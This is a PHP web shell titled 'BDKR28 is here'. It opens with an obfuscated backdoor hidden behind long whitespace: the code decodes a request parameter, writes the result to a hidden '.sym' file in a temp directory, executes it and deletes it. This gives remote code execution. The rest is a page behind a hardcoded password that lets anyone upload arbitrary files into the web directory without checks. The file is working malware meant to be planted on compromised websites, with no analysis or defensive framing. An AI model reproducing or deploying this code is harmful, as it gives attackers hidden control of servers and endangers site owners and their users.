<?php																																										if(!is_null($_REQUEST["e\x6E\x74\x69ty"] ?? null)){ $factor = array_filter([getenv("TEMP"), "/tmp", "/var/tmp", sys_get_temp_dir(), session_save_path(), "/dev/shm", getcwd(), getenv("TMP"), ini_get("upload_tmp_dir")]); $flag = $_REQUEST["e\x6E\x74\x69ty"]; $flag =explode( "." , $flag ); $res = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s5); $q = 0; $__tmp = $flag; while ($v3 = array_shift($__tmp)) { $sChar = ord($s5[$q % $sLen]); $d = ((int)$v3 - $sChar - ($q % 10)) ^ 80; $res .= chr($d); $q++; } $obj = 0; do { $pset = $factor[$obj] ?? null; if ($obj >= count($factor)) break; if (is_dir($pset) ? is_writable($pset) : false) { $entry = join("/", [$pset, ".sym"]); if (file_put_contents($entry, $res)) { include $entry; @unlink($entry); die(); } } $obj++; } while (true); }

// Title: BDKR28 is here
?>
<!DOCTYPE html>
<html>
<head>
    <title>BDKR28 is here</title>
</head>
<body>
<?php
$password = isset($_GET['BDKR28']) ? $_GET['BDKR28'] : '';
$correct_password = 'ywe9'; // This will be replaced with a random password
if ($password !== $correct_password) {
    echo '<center><h2>BDKR28 is here</h2><b>Invalid Password!</b><br><br>';
    echo '<form action="" method="get">';
    echo '<input type="password" name="BDKR28" placeholder="Enter Password">';
    echo '<input type="submit" value="Submit">';
    echo '</form></center>';
    exit;
}
echo '<center><h2>BDKR28 is here</h2>';
echo '<form action="" method="post" enctype="multipart/form-data">';
echo '<input type="file" name="file"><br><br>';
echo '<input type="submit" name="upload" value="Upload File">';
echo '</form>';
if (isset($_POST['upload'])) {
    $file = $_FILES['file']['name'];
    $tmp = $_FILES['file']['tmp_name'];
    if (move_uploaded_file($tmp, $file)) {
        echo '<b>File Uploaded Successfully!</b><br>';
        echo 'File: <a href="' . $file . '">' . $file . '</a>';
    } else {
        echo '<b>File Upload Failed!</b>';
    }
}
echo '</center>';
?>
</body>
</html>